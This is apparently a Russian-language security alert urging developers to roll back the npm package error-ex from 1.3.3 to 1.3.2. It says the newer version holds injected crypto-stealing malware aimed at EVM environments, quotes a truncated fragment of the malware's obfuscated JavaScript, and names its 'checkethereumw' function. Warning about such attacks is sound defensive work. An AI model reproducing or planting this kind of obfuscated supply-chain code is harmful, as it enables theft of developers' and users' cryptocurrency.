PSA: Разработчики, откатите ваш React и все JavaScript Dapps до версии 1.3.2 пакета error-ex в зависимостях. Больше информации для разработчиков React приложений: я углубился в проблему. Уязвимость находится в npm пакете error-ex версии 1.3.3 и специфична для Ethereum, но может быть использована для любой EVM цепочки. Откатитесь до 1.3.2. строка Она вызывает "checkethereumw" JavaScript const _0x112fa8=_0x180f;(function(_0x13c8b9,_0_35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+... // ...много других строк нечитабельного кода Это сильно обфусцированный код, предназначенный для того, чтобы быть нечитабельным. Но среди этого хаоса было имя функции, которое заставило нашу кровь стынуть: checkethereumw. "Злоумышленник внедрил вредоносное ПО в js пакет, вероятно, предназначенное для обнаружения и кражи криптовалюты из EVM окружения, в котором оно работало. Вызов fetch, который ломал нашу сборку, вероятно, был вредоносным ПО, пытающимся отправить украденные данные на сервер злоумышленника. Наша сборка провалилась просто потому, что наша версия Node.js была достаточно старой, чтобы не иметь глобальной функции fetch. В другом окружении атака могла пройти совершенно незамеченной." Исправление: Разработчики Dapp: не стройте с уязвимым js npm пакетом, откатитесь до 1.3.2 и пересоберите. Исправлено: Уязвимая версия 1.3.3 была удалена с Github, но 46.7 млн скачиваний по всему миру. Поднимите тревогу для любого разработчика, которого вы знаете. Откатитесь до v1.3.2.